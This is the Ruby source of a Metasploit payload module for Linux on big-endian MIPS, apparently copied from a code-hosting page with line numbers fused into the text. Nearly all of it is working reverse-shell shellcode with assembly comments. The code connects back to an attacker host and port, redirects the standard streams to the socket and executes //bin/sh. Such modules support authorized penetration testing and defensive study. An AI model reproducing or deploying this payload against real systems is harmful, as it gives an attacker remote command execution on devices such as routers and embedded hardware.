Path: blob/master/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 18478include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Linux Command Shell, Reverse TCP Inline',16'Description' => 'Connect back to attacker and spawn a command shell',17'Author' => [18'rigan <imrigan[at]gmail.com>', # Original shellcode19'juan vazquez' # Metasploit module20],21'References' => [22['EDB', '18226']23],24'License' => MSF_LICENSE,25'Platform' => 'linux',26'Arch' => ARCH_MIPSBE,27'Handler' => Msf::Handler::ReverseTcp,28'Session' => Msf::Sessions::CommandShellUnix,29'Payload' => {30'Offsets' => {},31'Payload' => ''32}33)34)35end3637def generate(_opts = {})38if !datastore['LHOST'] || datastore['LHOST'].empty?39return super40end4142host = Rex::Socket.addr_atoi(datastore['LHOST'])43port = Integer(datastore['LPORT'])4445host = [host].pack('N').unpack('cccc')46port = [port].pack('n').unpack('cc')4748shellcode =49# sys_socket50# a0: domain51# a1: type52# a2: protocol53"\x24\x0f\xff\xfa" + # li t7,-654"\x01\xe0\x78\x27" + # nor t7,t7,zero55"\x21\xe4\xff\xfd" + # addi a0,t7,-356"\x21\xe5\xff\xfd" + # addi a1,t7,-357"\x28\x06\xff\xff" + # slti a2,zero,-158"\x24\x02\x10\x57" + # li v0,4183 # sys_socket59"\x01\x01\x01\x0c" + # syscall 0x404046061# sys_connect62# a0: sockfd (stored on the stack)63# a1: addr (data stored on the stack)64# a2: addrlen65"\xaf\xa2\xff\xff" + # sw v0,-1(sp)66"\x8f\xa4\xff\xff" + # lw a0,-1(sp)67"\x34\x0f\xff\xfd" + # li t7,0xfffd68"\x01\xe0\x78\x27" + # nor t7,t7,zero69"\xaf\xaf\xff\xe0" + # sw t7,-32(sp)70"\x3c\x0e" + port.pack('C2') + # lui t6,0x1f9071"\x35\xce" + port.pack('C2') + # ori t6,t6,0x1f9072"\xaf\xae\xff\xe4" + # sw t6,-28(sp)73"\x3c\x0e" + host[0..1].pack('C2') + # lui t6,0x7f0174"\x35\xce" + host[2..3].pack('C2') + # ori t6,t6,0x10175"\xaf\xae\xff\xe6" + # sw t6,-26(sp)76"\x27\xa5\xff\xe2" + # addiu a1,sp,-3077"\x24\x0c\xff\xef" + # li t4,-1778"\x01\x80\x30\x27" + # nor a2,t4,zero79"\x24\x02\x10\x4a" + # li v0,4170 # sys_connect80"\x01\x01\x01\x0c" + # syscall 0x404048182# sys_dup283# a0: oldfd (socket)84# a1: newfd (0, 1, 2)85"\x24\x11\xff\xfd" + # li s1,-386"\x02\x20\x88\x27" + # nor s1,s1,zero87"\x8f\xa4\xff\xff" + # lw a0,-1(sp)88"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop89"\x24\x02\x0f\xdf" + # li v0,4063 # sys_dup290"\x01\x01\x01\x0c" + # syscall 0x4040491"\x24\x10\xff\xff" + # li s0,-192"\x22\x31\xff\xff" + # addi s1,s1,-193"\x16\x30\xff\xfa" + # bne s1,s0,68 <dup2_loop>9495# sys_execve96# a0: filename (stored on the stack) "//bin/sh"97# a1: argv "//bin/sh"98# a2: envp (null)99"\x28\x06\xff\xff" + # slti a2,zero,-1100"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"101"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"102"\xaf\xaf\xff\xec" + # sw t7,-20(sp)103"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"104"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"105"\xaf\xae\xff\xf0" + # sw t6,-16(sp)106"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)107"\x27\xa4\xff\xec" + # addiu a0,sp,-20108"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)109"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)110"\x27\xa5\xff\xf8" + # addiu a1,sp,-8111"\x24\x02\x0f\xab" + # li v0,4011 # sys_execve112"\x01\x01\x01\x0c" # syscall 0x40404113114return super + shellcode115end116end117118119